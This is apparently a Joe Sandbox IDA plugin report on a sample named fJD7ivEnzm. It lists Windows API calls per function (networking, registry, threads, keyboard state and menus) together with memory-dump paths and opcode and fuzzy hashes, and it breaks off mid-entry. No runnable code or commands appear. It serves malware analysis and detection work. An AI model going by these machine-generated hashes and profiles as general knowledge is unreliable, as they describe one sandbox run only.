                                                                          • Opcode ID: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                                                                          • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                                                                          • Opcode Fuzzy Hash: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                                                                          • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                                                                          APIs
                                                                            • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                                          • SendMessageW.USER32(75C123D0,00001001,00000000,?), ref: 00448E16
                                                                          • SendMessageW.USER32(75C123D0,00001026,00000000,?), ref: 00448E25
                                                                            • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                                          • String ID:
                                                                          • API String ID: 3771399671-0
                                                                          • Opcode ID: 66a9d50f8c9d6af755a83d84fc10a8c9f79f913464eba51571b63e3dd0d935a7
                                                                          • Instruction ID: 7a731ed810a83f1ebb4df5e1cc4d29f9b75a103154dfe2ed632c3d1cef216bf4
                                                                          • Opcode Fuzzy Hash: 66a9d50f8c9d6af755a83d84fc10a8c9f79f913464eba51571b63e3dd0d935a7
                                                                          • Instruction Fuzzy Hash: 72513970204244AFF720DF24CC85FAE7BB9AF15314F10495EFA999B292CB79E549CB18
                                                                          APIs
                                                                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                          • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                                                                          • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                                                                          • _memmove.LIBCMT ref: 0044B555
                                                                          • _memmove.LIBCMT ref: 0044B578
                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                                                                          • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                                                                          • String ID:
                                                                          • API String ID: 2737351978-0
                                                                          • Opcode ID: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                                                                          • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                                                                          • Opcode Fuzzy Hash: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                                                                          • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                                                                          APIs
                                                                          • ___set_flsgetvalue.LIBCMT ref: 0041523A
                                                                          • __calloc_crt.LIBCMT ref: 00415246
                                                                          • __getptd.LIBCMT ref: 00415253
                                                                          • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                                                                          • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                                                                          • _free.LIBCMT ref: 0041529E
                                                                          • __dosmaperr.LIBCMT ref: 004152A9
                                                                            • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                          • String ID:
                                                                          • API String ID: 3638380555-0
                                                                          • Opcode ID: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                                          • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
                                                                          • Opcode Fuzzy Hash: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                                          • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
                                                                          APIs
                                                                          • VariantInit.OLEAUT32(?), ref: 0046C96E
                                                                            • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                            • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                            • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                                            • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                                            • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$Copy$ClearErrorInitLast
                                                                          • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                          • API String ID: 3207048006-625585964
                                                                          • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                                          • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                                                                          • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                                          • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                                                                          APIs
                                                                          • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                                                                            • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                                          • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
                                                                          • gethostbyname.WSOCK32(?), ref: 004655A6
                                                                          • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                                                                          • _memmove.LIBCMT ref: 004656CA
                                                                          • GlobalFree.KERNEL32(00000000), ref: 0046575C
                                                                          • WSACleanup.WSOCK32 ref: 00465762
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                                                                          • String ID:
                                                                          • API String ID: 2945290962-0
                                                                          • Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                                          • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                                                                          • Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                                          • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                                                                          APIs
                                                                          • GetSystemMetrics.USER32(0000000F), ref: 00440527
                                                                          • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                                                                          • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                                                                          • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                                                                          • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                                                                          • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                                                                          • String ID:
                                                                          • API String ID: 1457242333-0
                                                                          • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                                          • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                                                                          • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                                          • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                                                                          APIs
                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: ConnectRegistry_memmove_wcslen
                                                                          • String ID:
                                                                          • API String ID: 15295421-0
                                                                          • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                                          • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
                                                                          • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                                          • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                                                                          APIs
                                                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                          • _wcstok.LIBCMT ref: 004675B2
                                                                            • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                                          • _wcscpy.LIBCMT ref: 00467641
                                                                          • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                                          • _wcslen.LIBCMT ref: 00467793
                                                                          • _wcslen.LIBCMT ref: 004677BD
                                                                            • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                                          • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                                                                          • String ID: X
                                                                          • API String ID: 780548581-3081909835
                                                                          • Opcode ID: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                                                                          • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
                                                                          • Opcode Fuzzy Hash: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                                                                          • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
                                                                          APIs
                                                                            • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                            • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                            • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                            • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                            • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                          • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                                                                          • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                                                                          • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                                                                          • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                                                                          • CloseFigure.GDI32(?), ref: 0044751F
                                                                          • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                                                                          • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                          • String ID:
                                                                          • API String ID: 4082120231-0
                                                                          • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                                          • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                                                                          • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                                          • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                                                                          APIs
                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                                                                          • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                                                                          • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                                                                          • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                                                                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                                                                          • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                                                                          • String ID:
                                                                          • API String ID: 2027346449-0
                                                                          • Opcode ID: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                                          • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                                                                          • Opcode Fuzzy Hash: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                                          • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                                                                          APIs
                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                            • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                          • GetMenu.USER32 ref: 0047A703
                                                                          • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                                                                          • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                                                                          • _wcslen.LIBCMT ref: 0047A79E
                                                                          • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                                                                          • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                                                                          • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                                                                          • String ID:
                                                                          • API String ID: 3257027151-0
                                                                          • Opcode ID: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                                                          • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                                                                          • Opcode Fuzzy Hash: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                                                          • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                                                                          APIs
                                                                          • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastselect
                                                                          • String ID:
                                                                          • API String ID: 215497628-0
                                                                          • Opcode ID: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                                                                          • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                                                                          • Opcode Fuzzy Hash: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                                                                          • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                                                                          APIs
                                                                          • GetParent.USER32(?), ref: 0044443B
                                                                          • GetKeyboardState.USER32(?), ref: 00444450
                                                                          • SetKeyboardState.USER32(?), ref: 004444A4
                                                                          • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                                                                          • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                                                                          • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                                                                          • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: MessagePost$KeyboardState$Parent
                                                                          • String ID:
